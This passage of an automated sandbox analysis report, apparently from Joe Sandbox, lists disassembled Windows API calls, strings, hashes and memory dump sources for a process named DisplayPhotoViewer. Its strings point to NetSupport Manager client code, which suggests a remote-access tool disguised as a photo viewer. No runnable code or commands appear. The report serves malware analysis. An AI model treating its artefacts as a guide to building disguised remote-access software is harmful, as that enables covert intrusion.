                                                                                                      • Part of subcall function 11027F50: ExitProcess.KERNEL32 ref: 11028009
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: ErrorExitLastMessageProcess_freewsprintf
                                                                                                    • String ID: ..\CTL32\NSMString.cpp$IsA()
                                                                                                    • API String ID: 2441568934-3853199760
                                                                                                    • Opcode ID: a2eb115ba9540d227b9205d4ee598dc42295338310caab022904c2ac67b8dda4
                                                                                                    • Instruction ID: 4766b44ffffd3637aa5141de8ea0a6579cce8d9982359020827248907fd4bc2e
                                                                                                    • Opcode Fuzzy Hash: a2eb115ba9540d227b9205d4ee598dc42295338310caab022904c2ac67b8dda4
                                                                                                    • Instruction Fuzzy Hash: 34D0A77ED1522356DB905E58BC00FC9F3841B10918F0544A4A8A863140F560640149E6
                                                                                                    APIs
                                                                                                    • GetWindowTextLengthA.USER32(00000000), ref: 11149114
                                                                                                      • Part of subcall function 11027F50: GetLastError.KERNEL32(?,00000000,?), ref: 11027F6C
                                                                                                      • Part of subcall function 11027F50: wsprintfA.USER32 ref: 11027FB7
                                                                                                      • Part of subcall function 11027F50: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11027FF3
                                                                                                      • Part of subcall function 11027F50: ExitProcess.KERNEL32 ref: 11028009
                                                                                                    Strings
                                                                                                    • m_hWnd, xrefs: 11149103
                                                                                                    • e:\nsmsrc\nsm\1201\1201f2\ctl32\wndclass.h, xrefs: 111490FE
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: ErrorExitLastLengthMessageProcessTextWindowwsprintf
                                                                                                    • String ID: e:\nsmsrc\nsm\1201\1201f2\ctl32\wndclass.h$m_hWnd
                                                                                                    • API String ID: 67735064-1557312927
APIs
• SetEvent.KERNEL32(00000000), ref: 111076E4
  • Part of subcall function 11027F50: GetLastError.KERNEL32(?,00000000,?), ref: 11027F6C
  • Part of subcall function 11027F50: wsprintfA.USER32 ref: 11027FB7
  • Part of subcall function 11027F50: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11027FF3
  • Part of subcall function 11027F50: ExitProcess.KERNEL32 ref: 11028009
Strings
Memory Dump Source
• Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
• Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
Yara matches
Similarity
• API ID: ErrorEventExitLastMessageProcesswsprintf
• String ID: ..\ctl32\Refcount.cpp$this->hReadyEvent
• API String ID: 2400454052-4183089485
APIs
• GetMenu.USER32(00000000), ref: 1101BA04
  • Part of subcall function 11027F50: GetLastError.KERNEL32(?,00000000,?), ref: 11027F6C
  • Part of subcall function 11027F50: wsprintfA.USER32 ref: 11027FB7
  • Part of subcall function 11027F50: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11027FF3
  • Part of subcall function 11027F50: ExitProcess.KERNEL32 ref: 11028009
Strings
• m_hWnd, xrefs: 1101B9F3
• e:\nsmsrc\nsm\1201\1201f2\ctl32\wndclass.h, xrefs: 1101B9EE
Memory Dump Source
• Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
• Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
Yara matches
Similarity
• API ID: ErrorExitLastMenuMessageProcesswsprintf
• String ID: e:\nsmsrc\nsm\1201\1201f2\ctl32\wndclass.h$m_hWnd
• API String ID: 1590435379-1557312927
APIs
• HeapReAlloc.KERNEL32(00000000,?,00000000,00000000,107065AB,00000000,?,00000000,1070473E,?,00000000,?,00000000,10712290,?), ref: 1070680B
• HeapAlloc.KERNEL32(00000008,000041C4,00000000,00000000,107065AB,00000000,?,00000000,1070473E,?,00000000,?,00000000,10712290,?), ref: 1070683F
• VirtualAlloc.KERNEL32(00000000,00100000,00002000,00000004), ref: 10706859
• HeapFree.KERNEL32(00000000,?), ref: 10706870
Memory Dump Source
• Source File: 00000006.00000002.3142604836.0000000010701000.00000020.00000001.01000000.00000018.sdmp, Offset: 10700000, based on PE: true
• Associated: 00000006.00000002.3142566254.0000000010700000.00000002.00000001.01000000.00000018.sdmp
• Associated: 00000006.00000002.3142766293.0000000010710000.00000002.00000001.01000000.00000018.sdmp
• Associated: 00000006.00000002.3142810095.0000000010712000.00000008.00000001.01000000.00000018.sdmp
• Associated: 00000006.00000002.3142851685.0000000010714000.00000004.00000001.01000000.00000018.sdmp
• Associated: 00000006.00000002.3142905527.0000000010722000.00000004.00000001.01000000.00000018.sdmp
• Associated: 00000006.00000002.3142942985.0000000010724000.00000002.00000001.01000000.00000018.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_10700000_DisplayPhotoViewer.jbxd
Similarity
• API ID: AllocHeap$FreeVirtual
• String ID:
• API String ID: 3499195154-0
APIs
• EnterCriticalSection.KERNEL32(111E09EC,00000000,?,?,1100C11B,00000000,00000000), ref: 1100D75F
• LeaveCriticalSection.KERNEL32(111E09EC,?,?,1100C11B,00000000,00000000), ref: 1100D7D0
  • Part of subcall function 1100D6C0: EnterCriticalSection.KERNEL32(111E09EC,1100CA2A,?,1100B42C,?,00000000,?,1100CA2A,?), ref: 1100D6C9
  • Part of subcall function 1100D6C0: LeaveCriticalSection.KERNEL32(111E09EC,1100B42C,?,00000000,?,1100CA2A,?), ref: 1100D741
• LeaveCriticalSection.KERNEL32(111E09EC), ref: 1100D79F
• LeaveCriticalSection.KERNEL32(111E09EC), ref: 1100D7BB
  • Part of subcall function 1100D670: EnterCriticalSection.KERNEL32(111E09EC,1100C3AB), ref: 1100D675
  • Part of subcall function 1100D670: LeaveCriticalSection.KERNEL32(111E09EC), ref: 1100D6AF
Memory Dump Source
• Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
• Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
Yara matches
Similarity
• API ID: CriticalSection$Leave$Enter
• String ID:
• API String ID: 2978645861-0
APIs
• EnterCriticalSection.KERNEL32(10718A40,?,74DF0F00,?,?,?,1070411C), ref: 10704082
• LeaveCriticalSection.KERNEL32(10718A40,?,74DF0F00,?,?,?,1070411C), ref: 107040A2
• EnterCriticalSection.KERNEL32(10718A40), ref: 107040B9
• LeaveCriticalSection.KERNEL32(10718A40), ref: 107040D3
Memory Dump Source
• Source File: 00000006.00000002.3142604836.0000000010701000.00000020.00000001.01000000.00000018.sdmp, Offset: 10700000, based on PE: true
• Associated: 00000006.00000002.3142566254.0000000010700000.00000002.00000001.01000000.00000018.sdmp
• Associated: 00000006.00000002.3142766293.0000000010710000.00000002.00000001.01000000.00000018.sdmp
• Associated: 00000006.00000002.3142810095.0000000010712000.00000008.00000001.01000000.00000018.sdmp
• Associated: 00000006.00000002.3142851685.0000000010714000.00000004.00000001.01000000.00000018.sdmp
• Associated: 00000006.00000002.3142905527.0000000010722000.00000004.00000001.01000000.00000018.sdmp
• Associated: 00000006.00000002.3142942985.0000000010724000.00000002.00000001.01000000.00000018.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_10700000_DisplayPhotoViewer.jbxd
Similarity
• API ID: CriticalSection$EnterLeave
• String ID:
• API String ID: 3168844106-0
APIs
• InitializeCriticalSection.KERNEL32(?,10708676,?,10705C5B), ref: 107078DF
• InitializeCriticalSection.KERNEL32 ref: 107078E7
• InitializeCriticalSection.KERNEL32 ref: 107078EF
• InitializeCriticalSection.KERNEL32 ref: 107078F7
Memory Dump Source
• Source File: 00000006.00000002.3142604836.0000000010701000.00000020.00000001.01000000.00000018.sdmp, Offset: 10700000, based on PE: true
• Associated: 00000006.00000002.3142566254.0000000010700000.00000002.00000001.01000000.00000018.sdmp
• Associated: 00000006.00000002.3142766293.0000000010710000.00000002.00000001.01000000.00000018.sdmp
• Associated: 00000006.00000002.3142810095.0000000010712000.00000008.00000001.01000000.00000018.sdmp
• Associated: 00000006.00000002.3142851685.0000000010714000.00000004.00000001.01000000.00000018.sdmp
• Associated: 00000006.00000002.3142905527.0000000010722000.00000004.00000001.01000000.00000018.sdmp
• Associated: 00000006.00000002.3142942985.0000000010724000.00000002.00000001.01000000.00000018.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_10700000_DisplayPhotoViewer.jbxd
Similarity
• API ID: CriticalInitializeSection
• String ID:
• API String ID: 32694325-0